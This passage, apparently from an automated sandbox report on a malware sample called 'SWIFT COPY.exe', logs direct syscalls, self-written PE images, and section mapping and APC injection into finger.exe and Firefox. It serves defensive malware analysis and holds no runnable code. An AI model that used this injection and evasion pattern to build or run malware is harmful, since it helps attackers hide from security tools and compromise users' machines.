                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01356962 mov eax, dword ptr fs:[00000030h]3_2_01356962
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E mov eax, dword ptr fs:[00000030h]3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E mov edx, dword ptr fs:[00000030h]3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_0137096E mov eax, dword ptr fs:[00000030h]3_2_0137096E
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B0946 mov eax, dword ptr fs:[00000030h]3_2_013B0946
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B89B3 mov esi, dword ptr fs:[00000030h]3_2_013B89B3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B89B3 mov eax, dword ptr fs:[00000030h]3_2_013B89B3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013B89B3 mov eax, dword ptr fs:[00000030h]3_2_013B89B3
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013429A0 mov eax, dword ptr fs:[00000030h]3_2_013429A0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013309AD mov eax, dword ptr fs:[00000030h]3_2_013309AD
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtTerminateThread: Direct from: 0x76F02FCC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe NtCreateUserProcess: Direct from: 0x76F0371C
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Memory written: C:\Users\user\Desktop\SWIFT COPY.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: NULL target: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Thread register set: target process: 8168
                Source: C:\Windows\SysWOW64\finger.exe Thread APC queued: target process: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Process created: C:\Users\user\Desktop\SWIFT COPY.exe "C:\Users\user\Desktop\SWIFT COPY.exe"
                Source: C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: XwGiOcrCkQ.exe, 00000006.00000002.3579205876.0000000000E90000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000000.2142454273.0000000000E91000.00000002.00000001.00040000.00000000.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293793802.0000000001981000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Queries volume information: C:\Users\user\Desktop\SWIFT COPY.exe VolumeInformation
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\SWIFT COPY.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SWIFT COPY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
